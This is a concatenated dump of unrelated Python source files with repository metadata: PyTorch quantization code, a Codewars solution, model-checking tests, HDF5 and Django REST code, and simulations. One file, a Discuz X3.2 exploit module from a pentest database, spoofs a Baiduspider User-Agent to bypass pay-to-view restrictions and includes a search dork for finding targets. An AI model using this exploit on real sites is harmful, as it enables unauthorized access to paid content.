def _annotate_add_relu(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
if node.op != "call_function" or node.target not in [
torch.ops.aten.relu_.default,
torch.ops.aten.relu.default,
]:
return
relu_node = node
add_node = relu_node.args[0]
assert isinstance(add_node, Node)
if add_node.op != "call_function" or add_node.target not in [
torch.ops.aten.add.Tensor,
torch.ops.aten.add_.Tensor,
]:
return
if _is_annotated([relu_node, add_node]):
return
input_qspec_map = {}
input_act0 = add_node.args[0]
if isinstance(input_act0, Node):
input_qspec_map[input_act0] = get_act_obs_or_fq_ctr(quantization_config)
input_act1 = add_node.args[1]
if isinstance(input_act1, Node):
input_qspec_map[input_act1] = get_act_obs_or_fq_ctr(quantization_config)
add_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map=input_qspec_map,
_annotated=True,
)
relu_node.meta["quantization_annotation"] = QuantizationAnnotation(
output_qspec=get_act_obs_or_fq_ctr(quantization_config),
_annotated=True,
)
def _annotate_add(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
add_node = node
if add_node.op != "call_function" or add_node.target not in [
torch.ops.aten.add.Tensor,
torch.ops.aten.add_.Tensor,
]:
return
if _is_annotated([add_node]):
return
input_qspec_map = {}
input_act0 = add_node.args[0]
if isinstance(input_act0, Node):
input_qspec_map[input_act0] = get_act_obs_or_fq_ctr(quantization_config)
input_act1 = add_node.args[1]
if isinstance(input_act1, Node):
input_qspec_map[input_act1] = get_act_obs_or_fq_ctr(quantization_config)
add_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map=input_qspec_map,
output_qspec=get_act_obs_or_fq_ctr(quantization_config),
_annotated=True,
)
def validate(self, model: torch.fx.GraphModule) -> None:
pass
@classmethod
def get_supported_operators(cls) -> List[OperatorConfig]:
return cls.supported_config_and_operators
| [
"pytorchmergebot@users.noreply.github.com"
] | pytorchmergebot@users.noreply.github.com |
c8aa00a8afba3954be9744854afed97a99745d3f | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/codewar/_Codewars-Solu-Python-master/src/kyu7_Linked_Lists-Move_Node.py | 4367bf1aeaa9de6050ecb664223c5ff2f974bf3a | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 2,573 | py | class Node(object):
def __init__(self, data):
self.data = data
self.next = None
class Context(object):
def __init__(self, source, dest):
self.source = source
self.dest = dest
class Solution():
"""
https://www.codewars.com/kata/linked-lists-move-node
Linked Lists - Move Node
Write a MoveNode() function which takes the node from the front of the source list and
moves it to the front of the destintation list. You should throw an error when the source list is empty.
For simplicity, we use a Context object to store and return the state of the two linked lists.
A Context object containing the two mutated lists should be returned by moveNode.
MoveNode() is a handy utility function to have for later problems.
JavaScript
var source = 1 -> 2 -> 3 -> null
var dest = 4 -> 5 -> 6 -> null
moveNode(source, dest).source === 2 -> 3 -> null
moveNode(source, dest).dest === 1 -> 4 -> 5 -> 6 -> null
Python
source = 1 -> 2 -> 3 -> None
dest = 4 -> 5 -> 6 -> None
move_node(source, dest).source == 2 -> 3 -> None
move_node(source, dest).dest == 1 -> 4 -> 5 -> 6 -> None
Ruby
source = 1 -> 2 -> 3 -> nil
dest = 4 -> 5 -> 6 -> nil
move_node(source, dest).source == 2 -> 3 -> nil
move_node(source, dest).dest == 1 -> 4 -> 5 -> 6 -> nil
The push() and buildOneTwoThree() functions need not be redefined.
There is another kata called Linked Lists - Move Node In-place that is related but more difficult.
Related Kata in order of expected completion (increasing difficulty):
Linked Lists - Push & BuildOneTwoThree
Linked Lists - Length & Count
Linked Lists - Get Nth Node
Linked Lists - Insert Nth Node
Linked Lists - Sorted Insert
Linked Lists - Insert Sort
Linked Lists - Append
Linked Lists - Remove Duplicates
Linked Lists - Move Node
Linked Lists - Move Node In-place
Linked Lists - Alternating Split
Linked Lists - Front Back Split
Linked Lists - Shuffle Merge
Linked Lists - Sorted Merge
Linked Lists - Merge Sort
Linked Lists - Sorted Intersect
Linked Lists - Iterative Reverse
Linked Lists - Recursive Reverse
Inspired by Stanford Professor Nick Parlante's excellent Linked List teachings.
"""
def __init__(self):
pass
def move_node_01(self, source, dest):
if not source:
raise ValueError
node = source
source = source.next
node.next = dest
return Context(source, node) | [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
5ca7cdea99f9f57fb931b9a94a17fc8138cf99c6 | 422950c243e556871090afe43335c9a3f53e0fbb | /exploit/cms_discuzx_3_2_authority_bypass.py | 08d06e64e926858c9154de642734f0e7d021b3eb | [] | no_license | wooluo/pentestdb | f08bca698c3759e98b7fec2abb88a5244402cca7 | 8390df27c81c86af02ceee88605b758ca34b7878 | refs/heads/master | 2021-01-24T11:44:27.417739 | 2016-03-28T11:22:29 | 2016-03-28T11:22:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,290 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2014-2015 alpha1e0
'''
from script.exploit import Exploit, Result
class DiscuzAB(Exploit):
expName = u"DiscuzX 3.2绕过虚拟币支付查看内容"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "x3.2"
reference = ['http://www.secpulse.com/archives/33393.html','http://www.wooyun.org/bugs/wooyun-2010-099659']
description = u'''
漏洞利用条件:1.DiscuzX 3.2;2.没有其他权限设置
gh: inurl:forum.php "金币 才能浏览"
'''
def _verify(self):
result = Result()
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
#userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
headers = {'User-Agent':userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code==200:
if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = userAgent
return result
def _attack(self):
result = Result()
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
headers = {'User-Agent':userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code==200:
if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
with open("result.html","w") as fd:
fd.write(response2.conetnt)
result['FileInfo'] = {}
result['FileInfo']['Filename'] = "result.html"
return result
| [
"yan.shifm@foxmail"
] | yan.shifm@foxmail |
07e5d9d0336c5ab60bb5a0c99ec81e75395d56d4 | b0dcee45a111e08f5cbbb9b1aacf2279b93a65dc | /ic3/ic3onz3/pdr_primary/test.py | f610d0514804495c3169c616d09c4d42bad02517 | [] | no_license | bacmive/paper_notes | 150a38779c13fe329cc6a309476ebac06348bc0e | 09687a23e6eff57c551e68bcb21ac5f198fae73a | refs/heads/master | 2023-02-20T20:06:19.755804 | 2021-01-03T04:25:17 | 2021-01-03T04:25:17 | 298,745,191 | 0 | 0 | null | 2021-01-03T04:25:19 | 2020-09-26T05:36:20 | Python | UTF-8 | Python | false | false | 4,551 | py | #!/usr/bin/python
from z3 import *
from pdr import PDR
def MutualExclusive():
len_inp = 7
len_var = 9
i2 = Bool('i2')
i4 = Bool('i4')
i6 = Bool('i6')
i8 = Bool('i8')
i10 = Bool('i10')
i12 = Bool('i12')
i14 = Bool('i14')
primary_inputs = [i2, i4, i6, i8, i10, i12, i14]
l16 = Bool('l16')
l18 = Bool('l18')
l20 = Bool('l20')
l22 = Bool('l22')
l24 = Bool('l24')
l26 = Bool('l26')
l28 = Bool('l28')
l30 = Bool('l30')
l32 = Bool('l32')
l16p = Bool(str(l16) + '\'')
l18p = Bool(str(l18) + '\'')
l20p = Bool(str(l20) + '\'')
l22p = Bool(str(l22) + '\'')
l24p = Bool(str(l24) + '\'')
l26p = Bool(str(l26) + '\'')
l28p = Bool(str(l28) + '\'')
l30p = Bool(str(l30) + '\'')
l32p = Bool(str(l32) + '\'')
variables = [l16, l18, l20, l22, l24, l26, l28, l30, l32]
primes = [l16p, l18p, l20p, l22p, l24p, l26p, l28p, l30p, l32p]
a34 = And(Not(i4), i2)
a36 = And(a34, Not(i6))
a38 = And(Not(i10), Not(i8))
a40 = And(a38, a36)
a42 = And(Not(i14), Not(i12))
a44 = And(a42 , a40)
a46 = And(a44 , Not(l16))
a48 = And(Not(l20) , l18)
a50 = And(a48 , l22)
a52 = And(Not(l26) , l24)
a54 = And(a52 , l28)
a56 = And(a54 , l30)
a58 = And(Not(a56) , Not(a50))
a60 = And(l20 , l18)
a62 = And(a60 , l22)
a64 = And(l26 , l24)
a66 = And(a64 , l28)
a68 = And(Not(a66) , Not(a62))
a70 = And(a68 , Not(l30))
a72 = And(Not(a70) , a58)
a74 = And(Not(a72) , i2)
a76 = And(a72 , Not(i2))
a78 = And(Not(a76) , Not(a74))
a80 = And(Not(l20) , Not(l18))
a82 = And(a80 , l22)
a84 = And(a82 , Not(i10))
a86 = And(a48 , l30)
a88 = And(a86 , l22)
a90 = And(i10 , Not(i8))
a92 = And(a90 , a88)
a94 = And(l20 , Not(l18))
a96 = And(a94 , l22)
a98 = And(a96 , i10)
a100 = And(a62 , a38)
a102 = And(l20 , i10)
a104 = And(Not(l20) , Not(i10))
a106 = And(Not(a104) , Not(a102))
a108 = And(Not(a106) , i8)
a110 = And(a108 , l18)
a112 = And(Not(a106) , Not(i8))
a114 = And(a112 , Not(l18))
a116 = And(Not(a114) , Not(a110))
a118 = And(Not(a116) , Not(a62))
a120 = And(Not(a118) , Not(a100))
a122 = And(Not(a120) , Not(a96))
a124 = And(Not(a122) , Not(a98))
a126 = And(Not(a124) , Not(a88))
a128 = And(Not(a126) , Not(a92))
a130 = And(Not(a128) , Not(a82))
a132 = And(Not(a130) , Not(a84))
a134 = And(Not(a132) , a78)
a136 = And(Not(l26) , Not(l24))
a138 = And(a136 , l28)
a140 = And(a138 , Not(i14))
a142 = And(a52 , l30)
a144 = And(a142 , l28)
a146 = And(i14 , Not(i12))
a148 = And(a146 , a144)
a150 = And(l26 , Not(l24))
a152 = And(a150 , l28)
a154 = And(a152 , i14)
a156 = And(a66 , a42)
a158 = And(l26 , i14)
a160 = And(Not(l26) , Not(i14))
a162 = And(Not(a160) , Not(a158))
a164 = And(Not(a162) , i12)
a166 = And(a164 , l24)
a168 = And(Not(a162) , Not(i12))
a170 = And(a168 , Not(l24))
a172 = And(Not(a170) , Not(a166))
a174 = And(Not(a172) , Not(a66))
a176 = And(Not(a174) , Not(a156))
a178 = And(Not(a176) , Not(a152))
a180 = And(Not(a178) , Not(a154))
a182 = And(Not(a180) , Not(a144))
a184 = And(Not(a182) , Not(a148))
a186 = And(Not(a184) , Not(a138))
a188 = And(Not(a186) , Not(a140))
a190 = And(Not(a188) , a134)
a192 = And(a190 , a78)
a194 = And(i6 , i4)
a196 = And(Not(i6) , Not(i4))
a198 = And(Not(a196) , Not(a194))
a200 = And(a198 , a192)
a202 = And(a200 , a198)
a204 = And(a202 , Not(a132))
a206 = And(a204 , Not(a188))
a208 = And(a206 , l32)
a210 = And(a208 , l16)
a212 = And(Not(a210) , Not(a46))
a214 = And(a150 , a94)
a216 = And(a214 , l32)
init = And(*[Not(variables[i]) for i in range(len_var-1)] + [(Not(variables[-1]))])
trans = And(*[l16p == And(True),
l18p == i8,
l20p == i10,
l22p == i4,
l24p == i12,
l26p == i14,
l28p == i6,
l30p == i2,
l32p == Not(a212)
])
post = Not(a216)
# print init
# print trans
# print post
return (primary_inputs, variables, primes, init, trans, post)
tests = {'MutualExclusive':MutualExclusive,}
def listTests():
for name in tests:
print name
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Run tests examples on the PDR algorithm")
parser.add_argument('-ls', action='store_true')
parser.add_argument('testname', type=str, help='The name of the test to run', default=None, nargs='?')
args = parser.parse_args()
if(args.ls):
listTests()
elif(args.testname!=None):
name = args.testname
print "=========== Running test", name,"==========="
solver = PDR(*tests[name]())
solver.run()
else:
for name in tests:
print "=========== Running test", name,"==========="
solver = PDR(*tests[name]())
solver.run() | [
"bacmive@sohu.com"
] | bacmive@sohu.com |
3665a02e2a26c184c4a4374e80fbd581e6dd5ba5 | 80e19038a65c64532fd986278a78cead0865d0b8 | /amelethdf-python/branches/nathanael/src/amelethdf/node/node_hdf.py | f43e34a6da904176a6365bb22921ea4cf62dac62 | [] | no_license | ThinkManhattan/amelet-hdf | 6470c6d5b5dcc47863d9bceb85df46882f8a1861 | de850be54b5f5782d73f6481279db9db1ab18360 | refs/heads/master | 2020-05-18T01:06:13.821829 | 2015-02-10T12:28:03 | 2015-02-10T12:28:03 | 35,437,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,988 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 15 févr. 2010
@author: nathanael
'''
from tables import openFile
from amelethdf.path import join, isabs, splits, split
from amelethdf.tree_print import TreeLink, TTL_G
__all__ = ['openHDF', 'HDFNode', 'HDFNodeError']
class HDFNodeError(Exception): pass
def openHDF(path, mode='r', PYTABLES_SYS_ATTRS=False, **kw):
hdf = openFile(path, mode, PYTABLES_SYS_ATTRS=PYTABLES_SYS_ATTRS, **kw)
return HDFNode(hdf, '/', '')
class HDFNode(object):
def __init__(self, hdf, where, name):
self.hdf = hdf
self.__where = where
self.__name = name
def __eq__(self, other):
return self.path == other.path
#---------------------------------------------------------------------------
#--- To string methods
#---------------------------------------------------------------------------
def __str__(self):
"""Return the default string view of this node.
"""
return str(self.get_hdfo())
def tostring(self):
"""Return the string tree view of this object.
"""
return self._tostring()
def __repr__(self):
return "<%s object at %s>" % (self.__class__.__name__, self.path)
#---------------------------------------------------------------------------
#--- File meta data an tools
#---------------------------------------------------------------------------
def close(self):
"""Close the file
"""
self.hdf.close()
@property
def isopen(self):
return self.hdf.isopen
@property
def filename(self):
return self.hdf.filename
#---------------------------------------------------------------------------
#--- PyTables access
#---------------------------------------------------------------------------
def get_hdfo(self):
"""Return the hdf object of this node.
"""
if self.__where == '/' and self.name == '':
return self.hdf.root
else:
return self.hdf.getNode(self.path)
hdfo = property(get_hdfo)
#---------------------------------------------------------------------------
#--- HDF Node property
#---------------------------------------------------------------------------
@property
def name(self):
"""Return the name of this data node.
"""
return self.__name
@property
def path(self):
"""Return the path of this node on the HDF File.
"""
return join(self.__where, self.__name)
#---------------------------------------------------------------------------
#--- Tree methods
#---------------------------------------------------------------------------
def get_root(self):
"""Return the root node of this tree.
"""
return self.__class__(self.hdf, '/', '')
def get_node(self, path):
"""Get a children node of this node.
"""
if isabs(path):
node = self.get_root()
else:
node = self
for name in splits(path):
if name != '':
node = node.get_child(name)
return node
#---------------------------------------------------------------------------
#--- Attributes methods
#---------------------------------------------------------------------------
def can_set_attr(self, name, val):
return True
@property
def attrs_name(self):
"""Return attributes list name.
"""
return self.hdfo._v_attrs._v_attrnamesuser
def has_already_attr(self, name):
"""Has already attribute named `name`
"""
return hasattr(self.hdfo._v_attrs, name)
def set_attr(self, name, val):
"""Set the attribute `name` at value `val`
Wrapper of PyTables method
"""
return self.hdfo._f_setAttr(name, val)
def get_attr(self, name):
"""Get the value of the attribute `name`
Wrapper of PyTables method
"""
return self.hdfo._f_getAttr(name)
def del_attr(self, name):
"""Delete the attribute `name`
Wrapper of PyTables method
"""
return self.hdfo._f_delAttr(name)
#---------------------------------------------------------------------------
#--- Children methods
#---------------------------------------------------------------------------
def can_create_child(self, name):
return True
def has_already_child(self, name):
"""has already child the child named `name`
"""
return name in self.hdfo._v_children.keys()
@property
def children_name(self):
"""Return children list name.
"""
return self.hdfo._v_children.keys()
def get_child(self, name, **kw):
"""Set a new child at this node.
"""
if self.has_already_child(name):
return self._build_child(name, **kw)
else:
raise HDFNodeError("Invalid children '%s' for the node '%s'" % (name, str(self)))
#---------------------------------------------------------------------------
#--- Iterator on Children
#---------------------------------------------------------------------------
def __len__(self):
"""Return the numbre of children.
"""
if hasattr(self.hdfo, '_v_children'):
return len(self.hdfo._v_children.keys())
else:
return 0
def __iter__(self):
"""iteration on the children
"""
if hasattr(self.hdfo, '_v_children'):
for child_name in self.hdfo._v_children.keys():
yield self.get_child(child_name)
def walk(self):
"""Visit all tree
"""
yield self
if len(self) > 0:
for child in self:
for sub in child.walk():
yield sub
#---------------------------------------------------------------------------
#--- Internal API
#---------------------------------------------------------------------------
def _hdf_node(self):
return HDFNode(self.hdf, self.__where, self.__name)
def _build_child(self, name):
"""Internal method to build child.
Prefer it at __class__ to build a child.
"""
return self.__class__(self.hdf, self.path, name)
def _tostring(self, tree_link=TreeLink()):
"""Internal API
Build a string tree view of this object
"""
if self == self.get_root():
name = split(self.hdf.filename)[1]
else:
name = self.name
s = str(tree_link) + name + self._tostring_attrs()
tree_link.append(TTL_G)
i = 0
for item in self:
i += 1
tree_link.follow(TTL_G, len(self) == i)
s += '\n' + item._tostring(tree_link)
tree_link.down()
return s
def _tostring_attrs(self):
"""Internal API
Build a string view of this node's attributes
"""
s = ''
i = 0
attrs_name = self.attrs_name
if len(attrs_name) > 0:
s += '('
for attr_name in attrs_name:
s += "%s%s=%s" % ('@', attr_name, str(self.get_attr(attr_name)))
i += 1
if i != len(attrs_name):
s += ', '
s += ')'
return s
def _create_group(self, name, **kw):
"""Internal API
Create a new group with the given `name` as son of this.
"""
if self.can_create_child(name):
self.hdf.createGroup(self.path, name)
return self._build_child(name, **kw)
def _create_table(self, name, description, **kw):
"""Internal API
Create a new table with the given `name` as son of this.
"""
if self.can_create_child(name):
self.hdf.createTable(self.path, name, description)
return self._build_child(name, **kw)
def _create_dataSet(self, name, dtype, shape=(0,), **kw):
"""Internal API
Create a new DataSet with the given `name` as son of this.
This DataSet is an homogeneous dataset of type `dtype`.
The shape of this dataset is given by `shape`, and the last dim of this
dataset can be enlarged along on last of its dimensions.
"""
if self.can_create_child(name):
self.hdf.createEArray(self.path, name, dtype, shape)
return self._build_child(name, **kw)
| [
"nathanael.muot@24d24c72-a858-11de-8ba5-91705c1537ed"
] | nathanael.muot@24d24c72-a858-11de-8ba5-91705c1537ed |
8c7e85117d674c5159d064fd0a355713d7d0a090 | 883f57bab7a14102e31a710e226560dc1d251201 | /handlers/deviantart.py | a43da285f78853f9144ce29a0ce256e7cdaa3d54 | [] | no_license | Syfaro/Mirror-Bot | 1d66fa397b75272c89d6626073a3a117eae93ad8 | c97c696a8d38688a93f52051d32ffd1008c6de6a | refs/heads/master | 2016-09-05T17:24:29.046727 | 2014-04-11T03:07:04 | 2014-04-11T03:07:04 | 18,151,878 | 2 | 0 | null | 2014-04-11T03:07:04 | 2014-03-26T19:58:39 | Python | UTF-8 | Python | false | false | 383 | py | import requests
def deviantart(thing, config):
"""
handler for deviantart.com
"""
api_url = "http://backend.deviantart.com/oembed?url={}".format(thing.url)
post = requests.get(api_url).json()
image = post['url']
title = post['title']
author = post['author_name']
response = {'link': image, 'author': author,
'title': title, 'source': thing.url}
return response | [
"kleptocis@gmail.com"
] | kleptocis@gmail.com |
01ecbd52726c167dca208300c5454339f0b8a5f8 | a922e0cb9185c24cd038919ff66fe8b1ca04cc45 | /python project/Source/tra_gen.py | e6cd7c85c313d6aca94c3bb46d933d0e4d542a4b | [] | no_license | teja2609/Python- | 2115a7e2060e28f6ee40791ec37495fcd353b319 | 891a0e4e5a3fb54ecdf8afc1f9d21ae3d2a51099 | refs/heads/master | 2021-01-08T19:03:08.046321 | 2019-02-09T00:59:02 | 2019-02-09T00:59:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,073 | py | import cv2
import glob
import numpy as np
import random
#initilaizing fisherface recognizer
fisherface = cv2.face.FisherFaceRecognizer_create()
def getfiles(gender, training_size):
#loading the dataset
file = glob.glob("E:\\cropped_faces\\{0}\\*" .format(gender))
random.shuffle(file)
train = file[:int(len(file) * training_size)]
predict = file[-int(len(file) * (1 - training_size)):]
return train, predict
def make_sets(): #creating lists
train_data = []
train_labels = []
predict_data = []
predict_label = []
for gender in genders:
training_set, prediction_set = getfiles(gender, 0.8) #getting first 805 of files
for object in training_set:
img = cv2.imread(object, 0)#reading the object image
face2 = cv2.resize(img, (350, 350)) #resizing the image
train_data.append(face2)
train_labels.append(genders.index(gender))
for object in prediction_set:
object = cv2.imread(object, 0) #reading the object
face2 = cv2.resize(object, (350, 350)) #resizing the object
predict_data.append(face2)
predict_label.append(genders.index(gender))
return train_data, train_labels, predict_data, predict_label
def run_recognizer():
data_training, labels_training, data_prediction, labels_predictions = make_sets()
print("size of the training set is", len(labels_training), "images")
#training the daraset
fisherface.train(data_training, np.asarray(labels_training))
positive = 0
for id, img in enumerate(data_prediction):
if (fisherface.predict(img)[0] == labels_predictions[id]):
positive += 1
percent = (positive * 100) / len(data_prediction)
return positive, percent
if __name__ == '__main__':
genders = ["female", "male"]
positive, percent = run_recognizer()
print("Processed ", positive, " data correctly")
print("Got ", percent, " accuracy")
#writing the training data
fisherface.write('D:\\models\gender_classifier_model.xml')
| [
"hjddh@mail.umkc.edu"
] | hjddh@mail.umkc.edu |
22ffd2e231fb963244be54d1406be85b8e6a2fad | 08bcc0fd0209a190444a516745d656438e15d096 | /app/profiles_api/views.py | 32572207f0aa3a58f14576e25464ffbe9952654a | [
"MIT"
] | permissive | ckilcioglu/profiles-rest-api | f0ce3ffeeac95f78b992c9ba2f0dfc97eba8f58d | c728959a4a03ff574c0898ae702f399e58705472 | refs/heads/main | 2021-12-04T07:31:35.455208 | 2021-09-15T13:33:20 | 2021-09-15T13:33:20 | 237,062,815 | 0 | 0 | MIT | 2021-06-10T19:43:28 | 2020-01-29T19:18:06 | Python | UTF-8 | Python | false | false | 6,782 | py | from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView):
"""A basic API view to test functionality"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
'Uses HTTP methods as functions (get, post, patch, put, delete)',
'Is similar to a traditional Django View',
'Gives you the most control over your logic',
'Is mapped manually to URLs',
]
return Response({'message': 'Hello!', 'an_apiview': an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
email = serializer.validated_data.get('email')
message = f'Hello {name} with {email}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handle partial updating an object"""
return Response({'message': 'PATCH'})
def delete(self, request, pk=None):
"""Delete an object"""
return Response({'message': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a Hello message"""
a_viewset = [
'Users actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new Hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle partial updating an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle creating and updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (permissions.UpdateOwnProfile,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', 'email')
class UserLoginApiView(ObtainAuthToken):
"""Handles creating user authentication tokens"""
# To enable in browsable API view
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creating/reading/updating profile feed items"""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (
permissions.UpdateOwnStatus,
IsAuthenticated
)
def perform_create(self, serializer):
"""Sets the user profiler to the logged in user"""
serializer.save(user_profile=self.request.user)
class PhoneBookViewSet(viewsets.ViewSet):
"""Handle requests to phonebook"""
serializer_class = serializers.PhoneBookSerializer
def list(self, request):
queryset = models.PhoneBook.objects.all()
serializer = self.serializer_class(queryset, many=True)
return Response(serializer.data)
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(
serializer.data,
status.HTTP_201_CREATED)
else:
return Response(
serializer.errors,
status.HTTP_400_BAD_REQUEST
)
def destroy(self, request, pk=None):
obj = get_object_or_404(models.PhoneBook, id=pk)
obj.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
obj = get_object_or_404(models.PhoneBook, id=pk)
serializer = self.serializer_class(obj)
return Response(serializer.data)
def update(self, request, pk=None):
"""Handle updating an object"""
obj = get_object_or_404(models.PhoneBook, id=pk)
serializer = self.serializer_class(obj, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(
serializer.errors,
status.HTTP_400_BAD_REQUEST
)
def partial_update(self, request, pk=None):
"""Handle partial updating an object"""
obj = get_object_or_404(models.PhoneBook, id=pk)
serializer = self.serializer_class(obj, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(
serializer.errors,
status.HTTP_400_BAD_REQUEST
)
| [
"ckilcioglu@gmail.com"
] | ckilcioglu@gmail.com |
202dca8ab3b08386832090e04de47e161cbdd4e6 | 135807a198ae54d6560a76a0739773b37a59afa5 | /Social Learning in learning by doing process.py | 36a832cac7b580a941f2e4df4ab13b8dc05d9d36 | [] | no_license | sanghyunpark4/Social-Learning-and-SCBB | 7315201320a98cfc0c0a7c793c928ae88e4cb716 | 79fb84efd1505aedaa4f2a7f6b9dc2076f31e789 | refs/heads/main | 2023-01-19T22:24:57.518533 | 2020-11-23T07:17:05 | 2020-11-23T07:17:05 | 315,229,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,830 | py | # Social learning and SCBB in learning by doing process Ver 1.0
# Importing modules
# from IPython import get_ipython
# get_ipython().magic('reset -sf')
import math
import random
import numpy as np
import matplotlib.pyplot as plt
import csv
import datetime
STARTINGTIME = datetime.datetime.now().replace(microsecond=0)
#####################################################################################################
# SET SIMULATION PARAMETERS HERE
T = 1000 # number of periods to simulate the model
sampleSize = 1000 # sample size
socialLearning = 1 # if 0, then agents do not from learn from experience of the other.
# if 1, then agents do observational learning.
# if 2, then agents do belief sharing.
choiceRule = 0 # if 0, then agents do greedy search.
# if 1, then agents follow soft-max rule with fixed tau.
# if 2, then agents follow soft-max rule with endogeneous tau.
tau = 0.05 # Soft-max temperature for fixed tau case
updateRule = 0 # if 0, then agents follow a Bayesian updating.
# if 1, then agents follow ERWA.
phi = 0.1 # degree of recency for EWRA rule
if socialLearning == 0:
print("Agents are isolated from each other (no social learning)")
elif socialLearning == 1:
print("Agents do observational learning")
elif socialLearning == 2:
print("Agents do belief sharing")
if choiceRule == 0:
if updateRule == 0:
print("Agents follow greedy search and bayesian updating")
elif updateRule == 1:
print("Agents follow greedy search and ERWA")
elif choiceRule == 1:
if updateRule == 0:
print("Agents follow soft-max with fixed tau and bayesian updating")
elif updateRule == 1:
print("Agents follow soft-max with fixed tau and ERWA")
elif choiceRule == 2:
if updateRule == 0:
print("Agents follow soft-max with endogenous tau and bayesian updating")
elif updateRule == 1:
print("Agents follow soft-max with endogenous and ERWA")
# Task environment
M = 50 # number of alternatives
noise = 0 # if noise = 0, then there is no noise in feedback. If noise > 0, then feedback is noisy.
reality = np.zeros(M)
######################################################################################################
# DEFINING RESULTS VECTORS
avg_agent_perf1 = np.zeros((T, sampleSize))
avg_agent_perf2 = np.zeros((T, sampleSize))
correct_choice1 = np.zeros((T, sampleSize))
correct_choice2 = np.zeros((T, sampleSize))
both_correct = np.zeros((T, sampleSize))
biased_beliefs1 = np.zeros((T, sampleSize))
biased_beliefs2 = np.zeros((T, sampleSize))
switching_behavior1 = np.zeros((T, sampleSize))
switching_behavior2 = np.zeros((T, sampleSize))
convergence = np.zeros((T, sampleSize))
# Defining functions
def genEnvironment(M): # Generate task environment
r = np.random.rand(M)
return r
def genPriors(M): # Generate random priors
r = np.random.rand(M)
return r
def getBest(reality): # max action selection
best = reality.argmax(axis=0)
return best
def dissimilarity(l1, l2):
diff = l1 - l2
c = float(np.sum(np.absolute(diff), axis=None) / M)
return c
def hardmax(attraction, t, M): # max action selection
